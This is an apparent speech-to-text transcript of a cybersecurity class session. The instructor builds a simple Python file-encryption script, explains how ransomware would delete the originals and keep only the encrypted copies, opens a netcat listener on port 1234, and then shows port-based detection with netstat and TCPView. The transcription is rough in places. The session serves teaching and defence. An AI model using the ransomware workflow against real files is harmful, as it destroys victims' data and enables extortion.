like dot encrypted. In that, I'm going to store all that scrambled data. Scrambled in the sense, so unreadable format data. Okay, encrypt underscore file name equal to file underscore to underscore encrypt. I mean, it's just simple Python code. Okay, So actually here we don't want to uh, put more effort. But once we know how to write and what are the library files can help me to write that code, and how that entire flow will work, right? Once we know that, easily we can able to do that. Is my voice is breaking? Okay, okay, okay. Okay, then fine, fine. Dot encrypt with open. Anyhow, when I try to execute, there's a chance of I'll get some errors. So while running, I need to fix some errors. Okay. Okay, so now what I did, so after reading that all the files, right, that all the files will get encrypted, then I'm going to store that file. Okay, so now what I'm going to do, so I just want to see some pop-up message, successfully encrypted files got saved. Okay, so once I have that error message, then easily I can understand. Okay, so for that, what I'm going to do, print first. I need to see if that file got encrypted or not. Okay, so yeah, successfully encrypted file underscore to underscore encrypt. So whenever you're planning to write some code like this, right? So first we need to know the complete workflow. Okay, so how that what and all the things we need. First, we need to specify the file. We need to generate a key, and we need to save that key in this things. Then I just want to, even if I want this, I can use. Otherwise, I can remove this. Okay, just see that is that file got created or not. Then I need to use that cipher. I need to encrypt this file. Okay, for how can I encrypt? First, I need to open that file. I need to read each and every line. Then I need to encrypt that, and I need to create it as a new file. Okay, so this is the actual flow I just created here. So I'm not going to run this on my Windows. I'm just going to run it on my Kali Linux, because once if I run it inside the virtual machine, right, so it will not affect my Windows. Even if it is not a malware, I just saw something like ransomware, but it's not actual ransomware. The ransomware created similar to this only. I mean DSA in the sense, so it's not. I don't want a proper DSA. At least if you, I mean, for code level architectures, you can use it for the. I mean, when you're writing some sort of script, something like this, right? You can use, but in web application side, so in the client application side, sure you need the DSA, because if you know the DSA, right, from there also you can able to find some sort of vulnerabilities. I'm using Kylo. I mean, you can connect Gemini, so many things you can connect with that VS Code. That will help you when you're writing the script, but don't believe completely on the what to say. Gemini you can use. Don't believe completely on the AI. because what happened, your complete mind scenario will be something different. That will give some other suggestion. Even if you can see that it will give me some suggestions, but I will not prefer that. Okay, so I know what I need. Okay, so mostly I will use what is in my mind, right? I'll just use that. So that's KILO. Nano space. I'll first create one new file. mkdir encrypt cd encrypt ls mk, and sorry, first I'll create file called demo.txt. Okay, so nan touch demo.txt nano demo.txt hello. I'll just give some content inside that. Hello, how are you? Okay, I just saved it. So I'll just create that Python file. enc.py. Sure, I'll get some library file errors. Uh, let's fix that because I not yet installed the crypto file, right? Let's see. So Python 3 space enc.py. See, there are different error. I think original crypto secret key. Okay, key got generator. After that key, I'm getting some error. Nano nc.py. The key got created. Crypto encrypt equal to, okay, this is the file, right? Encrypted equal to cipher dot encrypt dot original. Let's run this code. Sorry. Again getting same error, line 90. Just copy this file once again, just a minute. Just one, I'll just read the entire code. Okay, again we'll try nano enc.py. Yeah, so now it's working fine. Just the spelling mistake, that's it. So if you see here, it's got created, there's a demo text dot encrypted. So if I just read the demo file, right? demo.txt, you can see the actual data. So if I just give cat demo.text.encrypted, see, entire file got encrypted here. So here I'm just using some basic small level of encryption. But if it is a ransomware, what we do, we just remove this file and we'll just keep only this data. Even if you try to open, you can't able to open. And I will use some sort of hard encryption here. Here I just use only the basic thing, but in real time I'll just use the hard encryption. Then who will try to access this file, right? Even they try to decode this, it's very hard. If you see, right, so I'll just take this and I'll use hash identifier. So if you give the data here, okay, so we'll just use some online hash. Okay, mostly it's not trying to identify. Okay, I just use like this encryption. If you use here, right, let's see, is that possible to decode? Mostly it's hard to decode the data. Okay, so this is the type of encryption I have used in these entire scenario. Okay, so instead of this, if you want to use MD5 or else any other, you can try. That's not an issue. But so when you are coming to the real time, so we need to write our own script to create some sort of encryptions here. Okay, for the ransomware and all. Okay, so if you want to resolve this type of issue, right? Resolve in the sense, if you want to find out whether if the target running some sort of malicious files or not, what you can do, if it is a Python file, right? I'll just give you small uh, example how you can able to detect that. Okay, so here file.py, it's not this one. Okay, sorry, here we tried for that, right? So I'll just enable NC space -L and VP 1234. Okay, so after run this file, right? So if I want to see is there is any port numbers are running for this specific file, I can run netstat command. Once I run the netstat command, what happen? I can see which port numbers are utilizing to transfer the data. So for that, what I'm going to do, I'm just open my command prompt. Okay, I'm just going to connect with this system. Okay, that Metasploit system. So SSH MSF admin at the rate of. So why I am just connecting with this SSH instead of directly interacting with this terminal, right? Because it's already connected with some other service, right? So if I want to use any other, if I want to run any other command, so it will not allow me to run. Let's try. Okay, I'll do one more thing. So if I give Ansible, it will run in the backend. Okay, it's already connected. Okay, now what I will do, I'll just use um, netstat fntu lnp. If I give like this, you can see what and all the services are running. Okay, so here there is a chance you can see that grip 1 2 3 4. See, okay. So I just want to change it as a root user. Okay. So netstat fntulnp grep 1 2 3 4. It's not showing here. But mostly what happened once you execute that command, right? Sure, you can see in that netstat command. Okay, or else you can use some other tools like TCP dump. So if we have so many tools to find out if there is any unwanted open ports, ports are running in the system. Okay, we can use that because the reason why we are using TCP dump or TCP viewer, right? TCP viewer, sorry, it's not a TCP dump, TCP viewer. The tool name will be. So if you use the TCP viewer, so we can able to see what and all the port numbers are running, and for that port number connected to which sort of applications, everything we can see. Okay, there are so many tools to find out the open ports. Even we can go with the task manager, but why specifically we are going with that TCP view, that sort of tool, because TCP view and all lightweight tool. So whenever you are trying for some forensics level of investigations, you don't want to we can't able to install heavy weightage tool like a complete installation. Then you need to open that file. It's like a complete installations, but a lightweight tool in the sense double click it directly open, it will give you the output. That's it. Okay. Yeah. So any doubts you can ask me. Yeah, tomorrow we'll see that a few more malware creations, and I'll show you how to exploit the MySQL, and we see some more few service as well. Netstat TUNLNP in the sense, so Netstat will show you what and all the services are running. Okay, so in TU in the sense it will monitor UDP, TCP. So both the monitor, port numbers. So whatever the service are running, right? So it will give all the information. That's why we are giving TULNP, TCP and UDP service related of port information we need. Okay. Thank you. Yeah, I think I hope everyone are clear on the topic. Uh, yeah. So the script in the sense you are asking script which I have used, right? Yeah, you can take this. Okay. Okay. Yeah. So we'll see tomorrow. Yeah. So Amar.
We're done, sir, for the day.
Yeah. So today we complete the session. So we'll see tomorrow.
Okay, sir, sure. Thank you. Yeah, there is one candidate called cybersecurity into the session. So, dear friend, I just inform you many times you're not required to share the attendance link with anyone, or you should not require to do anything rest of the study. Okay, if you have any query or question, you can post into the chat box. Sharing the attendance and taking care of the questions, that is our duty. Okay, so you're violating the rules. So it's my humble request, no need to share of attendance from your side. We are here for that only. I hope you are getting my point.